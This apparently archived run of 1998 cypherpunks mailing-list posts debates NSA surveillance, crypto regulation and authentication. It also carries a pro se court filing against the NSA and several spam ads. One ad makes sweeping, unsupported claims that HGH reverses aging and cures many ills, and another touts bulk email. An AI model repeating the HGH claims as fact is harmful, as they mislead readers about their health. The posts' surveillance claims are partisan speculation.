You brought up email. We have secure email: PGP. So does the rest
of the world. Confidential email is available. Does NSA like it?
They certainly don't like the theory. They probably don't like us
using the algorithms. 

If, by "strong crypto" you mean any cryptographic technology used
for authentication, confidentiality, or otherwise then I must
agree with you. But no one regulates this.. they only regulate
a subset of this. It happens to be a subset that I like, but it
is not _the_ most vital thing needed for securing the internet.

It is not necessarily even the most important thing for e-commerce. 

> p.s.-- can you quote to me how many billions go to the nsa every
> year? and would you care to calculate how much of your own
> salary  from your paycheck is sent to them?  and you think
> you are getting your money's worth? rather than paying someone
> to hold you down?

This is irrelevent for me: I don't pay income tax. Even if I did,
I can't say whether or not I am getting my money's worth, because
I do not know what NSA is capable of. If NSA can factor 2048 bit
numbers easily or other such things, then yes.. I would say I am
getting my money's worth. 

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"..subordination of one sex to the other is wrong in itself, and now
one of the chief hindrances to human improvement.." John Stuart Mill
"The Subjection of Women"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Merchant Services <merchant@lightswirl.com>
Date: Tue, 11 Aug 1998 20:42:19 -0700 (PDT)
To: (Dear Friend)
Subject: ADV: Do You Take Credit Cards?
Message-ID: <199808120545.WAA26759@ns1.lightswirl.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a responsible email being sent by K.M.A. 4401 Vineland Road, Orlando Fl 32811 
Tel. (407)422-6784. Email remove@lightswirl.com. The above statement complies with section 
301 requirements relating to transmissions of unsolicited commercial electronic mail. To 
remove your name from our mailing list immediately, please refer  to the statement at the
bottom of this message.

Superior Bankcard United
900 Mass Ave 
Arlington, MA 02174
1-888-518-6842


**************************************************************************************


Do you take credit cards?

 
If you said NO than your missing out on impulse sales! We can get you up and running 
in as little as 7 days even if you've had past credit problems!

No Application Fees!

Low $19 per month software or equipment leases!

Only $550 to purchase equipment or software!

3 months same as cash program pay $183.33 for 3 months and then 
you own your processing equipment or software!

Deal direct with the company NOT commisioned sales people 

Visit us on the web at HTTP://WWW.WEBTRANS2.com or call us at 
1-888-518-6842!

Thank you for your time,

Chris

 

 





---------------
We are currently consolidating our many mailing lists and need
to update our databases. Our records indicate that you may have
inquired in the past. If this is not the case, please reply
with "REMOVE" in the subject field to never receive email offers
from this vendor.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Tue, 11 Aug 1998 20:53:16 -0700 (PDT)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Internet is rickety
In-Reply-To: <199808120026.RAA28008@netcom13.netcom.com>
Message-ID: <Pine.LNX.3.96.980811231603.12087A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Aug 1998, Vladimir Z. Nuri wrote:

> MG: it's a question: do you imlement security top down,
> or bottom up? which is the top? the internet, or
> the computer?
> 
> it's very taoist-- I don't think there is a correct answer.

The answer depends very much on what your goals are. 

> I do think however that crypto *everywhere* over the
> internet is a major part of the solution. and yes, NSA
> is not fully responsible for the lack of it. the
> patent system & greed is involved in some of the deficiency.
> but the NSA is responsible for far more than most people
> realize. are you aware they regularly visit software
> companies developing crypto to squelch any innovation?
> basically, through bribes that they call "grants" or
> "purchase agreements"...

I am aware of the allegations, yes. I would not be surprised if
they use this tactic. If I were in their position, and my job
were to at least try to read every message sent by every foreign
governments, especially those under crypto I suspect I would
try very hard to limit the amount of strong crypto that these
governments have. This may mean limiting the amount of crypto
that the citizens of the U.S. have. So be it then. The NSA
does not have the job of ensuring unbreakable kick-ass privacy
and crypto to the public. Their job is to read the Other Guy's
messages, and to make sure the Other Guy can't read Uncle Sam's
messages. We speculate that they do both reasonably well.

I am reminded of the cypherpunk's charter. We have to create
privacy for ourselves. We can't expect others to not get in
our way or to help us out. This is reality.

> you're against commerce on the internet? what are you,
> a luddite? <g> seriously, I don't have much to say to you,
> if you oppose it. the internet is already the backbone of
> a new economy.

Then you have little to say to me. I do not see the wisdom in
running commerce over a shit-box communication system like our
internet is. The technology sucks. The protocols suck. The
implementation of those protocols suck even more.

> crypto will help secure it further.

This implies that it is not secure now, yes? Why the hell would you
run commerce over something that you know is fundamentally flawed?
It lacks wisdom.

> >Lets be factual: NSA doesn't regulate authentication technology and
> >most of what we need to fix these problems is secure authentication,
> >not confidentiality. 
> 
> it's an artificial distinction. it's all crypto. standing in
> front of any of it is standing in front of all of it. the NSA
> doesn't lead, they block. get out of the way!!

Right. Whatever. So then I suspect that you support any jackass running
around with a duffel full of C4 then, right? After all .. its all
technology. Science is pure; technology is using science as a means to
an end. That end defines whether or not we are talking about a psycho
with a bunch of C4 or a responsible civil engineer preparing to take
down a building in a controlled fashion.

This is not to imply that crypto is like C4 .. it isn't .. however
we must remember that while the mathematics of crypto are pure, we
can use that basis for a variety of things. One of them is authentication
the other is confidentiality. The FBI has no problems with the engineering
having dynamite out on the street, but they will get really pissed if it
is some average Joe. The NSA doesn't care about American's using strong
crypto (presumably) and they don't care about foreigners using
authentication technology. 

This 'artificial distinction' is a very real one.. it is the difference
between a terrorist authenticating himself as a terrorist or keeping
the fact that he is a terrorist (and his next target) a secret. 

I am not claiming that I think misuse of crypto is a legitimate reason
to bottle it up, but one must be reasonable and look at it from NSA's
perspective.

> you say, a taxpayer of the US should consider himself "getting
> his money's worth" out of the NSA if the NSA can crack 2048
> bit keys. well hee, hee. that's pretty funny. what if they
> find the bazillionth prime number? would you be getting
> your money's worth then too? it's the same technology, no?

If the NSA is so far ahead of the general public in mathematics,
then yes.. considering that the NSA's job is to break crypto, we
should feel that we are getting our money's worth. Now, whether
or not we want to spend our money on that in the first place is
a different story. Selling me a champion racehorse for $1 is a
damn good deal, and it is worth the money.. but I don't have much
use for a horse.

> death to the NSA leeches!!! the US taxpayers have been
> submitting to government-originated *bloodletting* for too long

Then don't pay taxes. It is a rather simple fix. I don't like big
government much myself, but I'll be damned if I am going to piss and
moan and claim that it is the root of our evils. It isn't .. rather,
our evils give birth to such monstrosities in the first place.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Let your life be a counter-friction to stop the machine."
			Henry David Thoreau "Civil Disobedience"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Tue, 11 Aug 1998 23:46:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Mitsubishi Electric Corp. has decided to make its MISTY public    key......
Message-ID: <19980812064612.2435.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Mitsubishi Electric Corp. has decided to make its MISTY public key
encryption algorithm available free of charge in an attempt promote its 
use.


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: imail22@usa.net
Date: Tue, 11 Aug 1998 22:19:12 -0700 (PDT)
To: marketers@ANYwhere.com
Subject: EXPLOSIVE ADVERTISEMENT....
Message-ID: <199808120513.BAA13924@demeter.sunyit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bulk email......
 
     Absolutely the most powerful form of advertising available today. 
 
       Dollar-for-dollar, it blows away any other form of advertising in the 
          amount of sales generated per advertising dollar spent.
 
           With over 45 million users on the Internet, the potential for new
                business or sales via bulk e-mail is simply incredible! 
 
             ***** We can make your bulk email ad campaign EASY! *****
 
                 Let us do the work and handle any flames or complaints!
         Need help getting started? No problem! We can create an ad for you!
 
     It is our standard policy to mail 20% over the amount contracted 

                          
                                           For more information:
                                                 
                                           Malthome@usa.net

                      Please include your name, address, phone number 
                                    and best time to contact you
                  Someone from our office will contact you within 48 hours






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 12 Aug 1998 09:05:27 -0700 (PDT)
To: "Nobuki Nakatuji" <bd1011@hotmail.com>
Subject: Re: Mitsubishi Electric Corp. has decided to make its MISTY public     key......
In-Reply-To: <19980812064612.2435.qmail@hotmail.com>
Message-ID: <3.0.5.32.19980812020528.00951e60@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 PM 8/11/98 PDT, Nobuki Nakatuji wrote:
>Mitsubishi Electric Corp. has decided to make its MISTY public key
>encryption algorithm available free of charge in an attempt promote its 
>use.
>
Which medium do they intend to make it available by???
w/ or w/out source?

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GIGABIZOP@hotmail.com
Date: Wed, 12 Aug 1998 00:36:57 -0700 (PDT)
To: <cypherpunks-unedited@toad.com>
Subject: GROW YOUNG WITH HGH!
Message-ID: <199808120736.AAA28069@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


"GROW YOUNG WITH HGH". You can now reverse the negative effects of 
aging with Human Growth Hormone. 

Do any of the following interest you?

Lose Fat, Gain Muscle 
Increase Energy Level
Increase Immune Function 
Enhance Sexual Performance
Improve Vision 
Increase Memory Retention
Improve Quality of Sleep 
Increase Exercise Performance

Increase Cardiac Output 
Improve Skin Elasticity
Remove Wrinkles 
Eliminate Cellulite
Lower Blood Pressure 
Improve Cholesterol Profile
Increase Bone Mass 
Quicker Wound Healing

For complete details. visit http://www.designnet-pro.com/iops/hgh. 

Fully supported by The American Academy of Anti-Aging. New York 
Times Best Selling Book "Grow Young with HGH". This awesome 
product is documented in thousands of case studies, check it out! 
You deserve to check this product out and FEEL YOUNG AGAIN! Visit 
http://www.designnet-pro.com/iops/hgh. 

FREE Audio Cassette offered when visiting our web site. 

Turn HGH into an Incredible Home Based Business opportunity! Visit 
http://www.designnet-pro.net/iops/hgh. 

If you wish to be removed from future mailings please reply to 
this message with REMOVE and we will remove you from our mailing 
lists. 

Thank you for your time.

 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 12 Aug 1998 01:18:30 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 11, 1998
Message-ID: <199808120815.DAA32612@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/   for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================

 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 12 Aug 1998 02:51:53 -0700 (PDT)
To: vznuri@netcom.com>
Subject: RE: Internet is rickety
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F833B@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri[SMTP:vznuri@netcom.com] wrote


> MG: it's a question: do you imlement security top 
> down, or bottom up? which is the top? the internet, 
> or the computer?
> it's very taoist-- I don't think there is a correct answer.

You implement security on the systems in which you
have an interest. If you run a large email server you secure
that. If you don't want people to read what's on your
own PC, you secure that. If we all look after what's in 
our own hands it will all work.

But remember the old rules of thumb of 

Ken




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 12 Aug 1998 03:37:13 -0700 (PDT)
To: "Vladimir Z. Nuri" <mgraffam@mhv.net>
Subject: RE: Internet is rickety
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F833E@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> mgraffam@mhv.net[SMTP:mgraffam@mhv.net] wrote:
> 
[this is heavily snipped to save bandwidth]

> I am aware of the allegations, yes. I would not be surprised if
> they [the NSA] use this tactic. If I were in their position,
> and my job were to at least try to read every message sent by 
> > every foreign  government 
> 
I think you have missed the point.  It's not that they are
reading messages sent by foreign governments. They 
are reading - at least potentially - all the messages
sent by their own citizens.  Effectively all Internet messages
that pass through North America are monitored.
All international phone calls are monitored
and I would guess that internal  US ones are as well, 
although there is not puch published  on that.

Some US citizens (I am not one) seem to have a touching
faith in the idea that the CIA and NSA will not spy on 
US citizens because it isn't in the powers given to them.   
If they are that scrupulous then they would just have
to get the data from their friends in GCHQ who have
no such constitutional limitation and are certainly
in a position to monitor most international phone calls
and Net traffic originating in the USA.

Like they said on the BBC a few weeks ago the 
"worst kept secret" in Whitehall is that NSA  and GCHQ 
together have been tapping *all* the electronic
communications passing through the UK and
have been sharing the data with each other since the war.
(with GCHQ being rumoured to give far more to NSA
than the other way round)  And if they behave like that 
in the UK why not in the US?

> I suspect I would
> try very hard to limit the amount of strong crypto that these
> governments have.

But they haven't managed to do that. And it isn't
really what they want to do. They want to limit the 
strong crypto available to *you* because they want to read 
*your* mail. (Why would they want to do that - see
this mailing list /passim/ for the last 5 years or so -
it's so full of ideas and rants on the subject that
some of them have to be right if only at  random :-)

Like I said my government - the UK - has a deal with your
government - the US - that allows your government
to tap my phone calls and read my email. And it works the
other way round as well. If you phone anyone outside the
US or send any other kind of electronic messages outside
the US or that pass through or near a GCHQ  station 
then my government will listen to you  with the 
connivance and encouragement  of your government.
Far from keeping your communications secret your
government is actually paying foreigners to tap them.

Look at a map of undersea cables some time - then compare it
with a map of British and Commonwealth military
bases - like Gibraltar, Malta, Diego Garcia, Ascencion Island,
Cyprus, St. Helena, the Falklands - your lot have a similar
setup in the Pacific, and the Ozzies and Kiwis look after the 
south-west Pacific and southern ocean.  Over half the Internet 
traffic in the  world passes through Falls Church, Virginia. Why are
there so many US diplomats and British military in Kenya?
And what *do* they do at Menwith Hill and Goonhilly Down?

Now I'm wasting bandwidth - becaus of course  everyone
who reads Cypherpunks knows all this stuff already.

> This may mean limiting the amount of crypto
> that the citizens of the U.S. have. So be it then. The NSA
> does not have the job of ensuring unbreakable kick-ass privacy
> and crypto to the public. 

> Their job is to read the Other Guy's messages, 
> and to make sure the Other Guy can't read Uncle Sam's
> messages. We speculate that they do both reasonably well.

And *you* *are* the Other Guy.
Wake up and smell the static.

> Selling me a champion racehorse for $1 is a
> damn good deal, and it is worth the money.. 
> but I don't have much  use for a horse.

I'll buy her off you for 1 dollars and 50 Belgian Francs
 - now you've made a profit :-)

Ken Brown (usual disclaimers apply)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Wed, 12 Aug 1998 04:10:28 -0700 (PDT)
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: RE: Internet is rickety
In-Reply-To: <896c7c3540c3d111ab9f00805fa78ce2013f833e@texaco.com>
Message-ID: <Pine.LNX.3.96.980812063302.16111A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Aug 1998, Brown, R Ken wrote:

> I think you have missed the point.  It's not that they are
> reading messages sent by foreign governments. They 
> are reading - at least potentially - all the messages
> sent by their own citizens.

Well.. like I said before, I would not doubt much that is attributed to
government agencies along these lines. I do not trust NSA to give me
privacy: not only is it not their job, one can be more or less assured
that such groups with the power to eavesdrop, will, even if it is a few
rogue individuals. 

This is why I create my own privacy; and if they can get past the crypto
that I use, then my hat goes off to them.

> Some US citizens (I am not one) seem to have a touching
> faith in the idea that the CIA and NSA will not spy on 
> US citizens because it isn't in the powers given to them.   

There is no love lost between my government and I, especially the likes
of certain groups, like CIA. 

I suspect that the spooks do more than sit on a wire and listen too.

But this has nothing to do with the fact that US citizens can _use_
whatever type of crypto we damn well feel like. NSA might not give us
the goods on what sort of crypto _they_ use, but hell, this is to be
expected! No sweet military technology is given up for public consumption
until it is more or less useless. why should we expect crypto to be any
different? 


> > I suspect I would
> > try very hard to limit the amount of strong crypto that these
> > governments have.
> 
> But they haven't managed to do that. And it isn't
> really what they want to do. They want to limit the 
> strong crypto available to *you* because they want to read 
> *your* mail.

This is paranoia, plain and simple. If this were true, I'd expect to
see some evidence. If they didn't want U.S. citizens to have decent
crypto, why be involved with DES at all? Why release Skipjack? Why
not lobby Congress (like they do so well) and kill AES? If they don't
want us to have decent crypto, why does the U.S. government give us
so much of it?! 

As far as I can tell you will either have to claim that the crypto they
give us is shit, which there is no evidence for, or you need to come up
with a way that giving us strong crypto lets them read our mail (in
the long-term maybe?). Either way, it is a good-ole fashion
self-reinforcing conspiracy theory. No thanks.

I'd be the first to admit that there are a bunch of bad apples in the
government.. sure.. but I can't see how we can reasonably claim some
far-reaching conspiracy to turn the U.S. into a police state.

> > Their job is to read the Other Guy's messages, 
> > and to make sure the Other Guy can't read Uncle Sam's
> > messages. We speculate that they do both reasonably well.
> 
> And *you* *are* the Other Guy.
> Wake up and smell the static.

This may very well be. Why do you think I have PGP installed? 
I'm not saying NSA is our friend, for Christ's sake.. there are
plenty of things about NSA policy that I dislike. There are probably
a whole shit-load of things that I don't know about that I would hate.

But none of this makes NSA look any different in my eyes than any other
group of bastards who have been given a bit of authority and have been
around for more than 10 minutes. So what else is new?

I'm merely saying that Forte Meade doesn't have a Room 101 is all .. 
NSA isn't the last bastion of evil, guys, they are a real pain in the
ass, sure... but if you ask my third-grade teacher, she would probably 
say the same thing about me.

I'd love to see NSA get disbanded, and while I'm at it, I figure it might
be nice to disband the whole damn Union too. But not only is that not
realistic, it is probably pretty damn dangerous given the boat load of
freaks and psychos we have running around in this country.

..now, if you'll excuse me, I have a boat to catch..

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Let your life be a counter-friction to stop the machine."
			Henry David Thoreau "Civil Disobedience"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 12 Aug 1998 06:10:28 -0700 (PDT)
To: senator@wyden.senate.gov
Subject: Crypto AG by Laszlo Baranyi
Message-ID: <35D19348.260A@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 8/12/98 6:49 AM

Laszlo Baranyi, lb@qainfo.se

One of the changes I made this morning to 

  RESPONSE TO MOTION FOR EXTENSION OF TIME TO FILE MEMORANDUM BRIEFS 
  ADDRESSING JURISDICTIONAL ISSUES

was to include http://www.qainfo.se/~lb/crypto_ag.htm

Your work is a major contribution to getting to story OUT THERE.

Morales will sign at about 07:30 this morning and I will mail at about
08:00.

Let's all hope for PEACEFUL settlement of this STUPID TRAGIC BLUNDER.

 Stupidity is difficult to underestimate.   Robert Franklin Wallace,
economist 

Best
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

I DO consulting in addition to directing Ph.D. degrees.

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html     
http://www.friction-free-economy.com/
http://www.mhpcc.edu/general/john.html

and building crypto units for the NSA/Sandia/DOE 
http://jya.com/da/whpda.htm

I am in the completion phase of digitizing the 

  Model 2600FX Ultrasonic Veneer Tester

using a high-speed, probably Dallas DCS80C320, 80C32.  But I am ensuring
that my
80C32 code works on all of the major 80C32 vendors parts.

See 2600FX at http://www.metriguard.com/METPROD.HTM.

One version of the green machine at http://www.metriguard.com/HCLT.HTM
runs on the Forth from my book.

I did the MASM interface to Visual Basic for

  PC Data System - Pentium PC & Windows (R) software system for
production-line lumber   testing - CLT & HCLT

I SINCERELY hope to return to DO ONLY technical work SOON.  

As soon as Morales and I GET OUR MONEY!  

I hope this is CLEAR.


UNITED STATES COURT OF APPEALS    
       FOR THE TENTH CIRCUIT    
    
William H. Payne        	   	                     )    
Arthur R. Morales                                               )    
                                                                           )    
Appellants Plaintiffs,                                           )    
                                                                           )      98-2156 
v                                                                         )	98-2157    
					       )	    
Lieutenant General Kenneth A. Minihan, USAF )    
Director, National Security Agency	                     )    
National Security Agency		                     )    
                                                                            )    
Appellees Defendants                                           )    
  
RESPONSE TO MOTION FOR EXTENSION OF TIME TO FILE MEMORANDUM BRIEFS 
ADDRESSING JURISDICTIONAL ISSUES
 
1	COMES NOW appellant plaintiffs [Appellants - Plaintiffs] Payne [Payne] and Morales [Morales]     
    
pro se litigants to exercise their rights  guaranteed under the Constitution and Federal Rules of Appellate

Procedure http://www.ca5.uscourts.gov/docs/frap-iop.htm
 
  Any party may file a response in opposition to a motion other than one for procedural order
  [for which see subdivision (b)] within 7 days after service of the motion,  ...

http://www.ca5.uscourts.gov/docs/frap-iop.htm#27 
 
and
 
  FRAP 26c  Additional Time after Service. When a party is required or permitted to act within a prescribed    
  period after service of a paper upon that party, 3 calendar days are added to the prescribed period unless the     
  paper is delivered on the date of service  stated in the proof of service. 

http://www.ca5.uscourts.gov/docs/frap-iop.htm#26c 
 
 MOTION FOR EXTENSION OF TIME TO FILE MEMORANDUM BRIEFS ADDRESSING 
JURISDICTIONAL ISSUES  [MOTION] was served on August 3, 1998 by Jan E Mitchell [Mitchell], 
Assistant US Attorney by mail.  Exhibit A.

2 Mitchell writes

  The Defendant-Appellee, National Security Agency [1], moves this Court for an Order extending the time
  to and including twenty-one (21) days following the date Plaintiffs-Appellants file their memorandum brief
  in which to file it memorandum briefs discussing jurisdictional issue in the above-referenced appeals. ...

    3.  Defendant-Appellee is not seeking an appeal and therefore, will NOT seek a certification for   
  interlocutory appeal from the District Court's memorandum Opinion and Order entered April 30, 1998, nor
  will Defendant-Appellee seek an order explicitly adjudicating all remaining claims.

    4.  On July 22, 1998, Plaintiffs-Appellants were granted an extension until September 1, 1998 to respond to   
  the Court's show cause orders of June 30, 1998.

    5 .  Defendant-Appellee seeks an additional twenty-one (21) days from the date in which Plaintiff's-
  Appellants' memorandum must be served in which to serve the memorandum briefs.  According to the Show 
  Cause Order, if Appellants do not seek and obtain a certification for interlocutory appeal or a final dispositive 
  adjudication concerning appeal N. 9821257, the appeal may be dismissed, in which case a jurisdictional brief 
  would not be required as to that appeal.  Should Plaintiffs-Appellants seek and obtain a certification for 
  interlocutory appeal pertaining to No. 2157, in the interest of economy, Defendant-Appellant seeks to file the 
  two memorandum briefs on the two very related jurisdictional issues at one time.

    6.  Undersigned counsel for Defendant-Appellee has contacted Plaintiff-Appellant William H. Payne who   
  has concurred on his own behalf and own behalf for Plaintiff-Appellant Arthur R. Morales in granting of this   
  motion. ...
 
3  Payne confirms 6 above in  fax

Monday 8/3/98 3:41 PM

  FAX

  Jan Elizabeth Mitchell
  Assistant U.S. Attorney
  U.S. Department of Justice
  United States Attorney
  District of New Mexico
  Post Office Box 607
  Albuquerque, NM 87103
  505/346-7274
  505/766-2868
  FAX 505/346-7205

  Dear Ms Mitchell:

  Purpose of the fax is to 

  1  review points covered in our 8/3/98 14:18 phone conversation
  2  suggest settlement.

  You phoned me today.

  You told me that you planned to file a motion or response to the Tenth circuit's
  request Morales and my response to the jurisdictional issue on the 21st of August.

  I told you that this was premature on your part since we had moved for a second time
  for an extension of time.

  I told you also that this matter was now before congress.

  You appeared to indicate to me that you were in the process of adding both Morales and
  Minihan as named parties in this appeal.

  You asked me if it would be agreeable to us if you filed a response to the Tenth circuit
  21 days AFTER Morales and I filed our response to the Tenth circuit on the jurisdictional
  issue.

  I AGREED.

  I spoke to Morales on the phone shortly after our phone conversation.

  Arguing points of law before court clerks and judges who have outstanding criminal complaint
  affidavits for crimes COMMITTED IN WRITING against them would be unproductive on Morales and my 
  part.

  Therefore, we will proceed to resolve the criminal conduct on the part of judges and court clerks
  before we proceed further in this matter.

  We will do this at the Congressional level.

  Senate Judiciary Committe chairman Orrin Hatch, unfortunately, failed to properly process a valid
  complaint on New Mexico district court chief judge John Conway in 1995.  
  http://www.jya.com/whp071598.htm

  Hatch's failure to properly respond in 1995, in large part, caused our current legal conflict with DIR NSA 
  Minihan.

  We foresee an unfortunate escalation of hostilities if this matter proceeds as it is.  

  We do not wish this.

  We seek settlement of the UNFORTUNATE matter at the earliest time.

  We ask your and Congressional help to settle this UNFORTUNATE matter before it gets WORSE.

  If I have made any essential material errors in reporting my impression of the contents of our conversation, 
  then I would appreciate you giving your impression of possible errors.  

  You can do this in the letter you said you would write to us.

  Sincerely,


  bill payne
  13015 Calle de Sandias NE          	        
  Albuquerque, NM 87111              	        

  Distribution

  Senate Judiciary Committee   e-mail
  Arthur R Morales e-mail			

4  Michell responds to 3 in letter dated August 4, 1998.   Exhibit B

Mitchell writes

    I have received Mr. Payne's FAX dated August 3, 1998 at 4:22.  I want to clarify a few points. ...

    As to the caption of the appeal, I have noted in the motion for extension of time which has been filed with  
  the Tenth Circuit that there was an additional Defendant numbed in the District Court case.  However, I am 
  constrained at the time to use the caption which the Tenth Circuit is reflecting on its pleadings.

  I will forward your FAX suggesting settlement to Defendants.

				Sincerely,

				JOHN J. KELLY
				United States Attorney
				  signature
				JAN ELIZABETH MITCHELL
				Assistant U. S. Attorney


5  Federal Rules of Civil Procedure http://www.law.cornell.edu/rules/frcp/overview.htm  Rule 54(b) states

(b) Judgment Upon Multiple Claims or Involving Multiple Parties.

  When more than one claim for relief is presented in an action, whether as a claim, counterclaim, cross-claim,   
  or third-party claim, or when multiple parties are involved, the court may direct the entry of a final judgment 
  as to one or more but fewer than all of the claims or parties only upon an express determination that there is 
  no just reason for delay and upon an express direction for the entry of judgment. In the absence of such 
  determination and direction, any order or other form of decision, however designated, which adjudicates 
 fewer   than all the claims or the rights and liabilities of fewer than all the parties shall not terminate the   
 action as to  any of the claims or parties, and the order or other form of decision is subject to revision at any
  time before the entry of judgment adjudicating all the claims and the rights and liabilities of all the parties.

Interpretation of meaning of 54(b) is

  RULE 54(b) JUDGMENTS UPON MULTIPLE CLAIMS OR INVOLVING MULTIPLE PARTIES

  CORE CONCEPT
     A judgment entered as to less than all claims in a lawsuit, or as to less than all parties in a lawsuit,
  is not immediately appealable.  Instead, the appeal must generally await the entry of judgment as to all 
   remaining claims and parties.  However, the district court can make a judgment as to less than all claims or 
  parties "final", and thus immediately appeals, by expressly certifying that no just cause exists to delay the 
  appeal and by directing the entry of judgment.

  APPLICATIONS
     Prerequisites to Rule 54(b)

    There are three prerequisites for obtaining an immediately appealable judgment from the district court 
  entered as to less than all claims or parties.

  1:  Multiple Claims or Parties Fully Resolved:  To be eligible for immediate appeal under Rule 54(b), a   
  partial adjudication must either (a) finally resolve at least one claim or (b) finally resolve the rights and 
  liabilities of  at least one party.  A claim or a party's interest MUST be adjudicated to finality, such that there 
  is nothing more to do that claim or that party but await the conclusion of the remaining portion of the 
  litigation.  This limitation is a pivotal one.  Rule 54(b) does not alter the normal rules of appellate finality for 
  individuals claims, and no appeal may be taken from district court ruling or any particular claim until the 
  court finally resolves that claim.

  Multiple claims exist where each claim is factually separate and independent, or where each claim could be 
  enforced separately.

  2:  No just Cause for Delay:  The district court must state, in clear and unmistakable language, that there is  
  no just cause to delay the appeal of the adjudicated claim or the adjudicated right and liability of a party.  
  Whether "just cause" exists is a determination made on a case-by-case basis.  Certain criteria guide the 
  court's consideration:

  o  The relationship between adjudicated and unadjudicated claims;

  o  The possibility that the need for appellate review might be mooted by future developments in district court;

  o  The possibility that the district court might be obligated to consider the same issue on a later occasion;

  o  The presence (or absence) or a claim or counterclaim that could result in a set-off against the judgment 
  now sought to be made final and appealable; and

  o  Other factors, including delay, economic and solvency concerns, shortening of trial time, frivolity or 
  competing claims, and expense.

  3:  Entry of judgment:  In clear and unmistakable language, the district court must also direct that judgment   
  is entered as to that one claim or one party.

  Explanation by the District Court

    In its order entering a Rule 54(b) judgment, the district court must clearly explain why it has concluded that 
  an immediate appellate review of that order is advisable.

  Burden of Proof

    The moving party bears the burden of establishing that a partial judgment should be entered under Rule 
  54(b).

  Discretion of District Judge

    Whether to enter a judgment under Rule 54(b) is reserved to the sound discretion of the district judge.  Such    
  arguments are contrary to the historic federal policy against piecemeal appeals.  For this reason, Rule 54(b) 
  orders are not granted routinely or an accommodation to counsel.  Instead, the district court must carefully 
  balance the needs of the parties for an immediate appeal against the interests of efficient management of the 
  litigation.

   Motions for Rule 54(b) Judgments

    A party may file a motion with the court to certify under Rule 54(b), or the court may do so on its own 
  initiative.

  Effects of Rule 54(b) Judgments

    Once entered, the time for appeal on the judgment begins to run, and does post-judgment interest.

  Appealability of Denials for Rule 54(b) Requests

    Allowing immediate appellate review of "partial" final judgments is a practice that departs from the federal
  courts' traditional opposition to piecemeal appeals.  Rule 54(b), thus, represents an unusual exception to this 
  settled policy.  Predictably, the court reject immediate attempt to challenge denials of Rule 54(b) judgments   
  as premature and unappealable until a final ruling his entered on the merits.

   Federal Civil Rules Handbook  1996, Baicker-McKee, Janssen, Corr, West Publishing Company

6  Appellants-Plaintiffs assert that there is NO REASON to seek a Rule 54 (b) certification for the 

REASON THAT New Mexico district judge Santiago Campos [Campos] already issued such certification.

FACT 1   4 May 1998  Campos writes

  NOW, THEREFORE, IT IS ORDERED that sua sponte, Defendant is DEEMED by the Court to be the NSA, 
  and not Lt. Gen. Kenneth A. Minihan. Future captions for this case should reflect this change.

  IT IS FURTHER ORDERED that Defendant's Motion to Dismiss Plaintiff Morales is GRANTED.

 http://jya.com/whp043098.htm

1: [A] claim or a party's interest MUST be adjudicated to finality ... has been satisfied.

FACT 2   2:  is satisfed.   [N]o just Cause for Delay:  

Dismissing Minihan and Morales have nothing to do with the remaining claims of whether AppelleeS-

DefendantS Minihan and NSA provide lawfully requested documents on

	1  Iran messages given to Iraq during the Iraq/Iran war. http://www.aci.net/kalliste/speccoll.htm
	    http://caq.com/cryptogate
              2  Libyan message intercepted by the US
	3  deficient NSA cryptographic algorithms

FACT 3    3: In clear and unmistakable language, the district court must also direct that judgment   
                     is entered as to that one claim or one party.

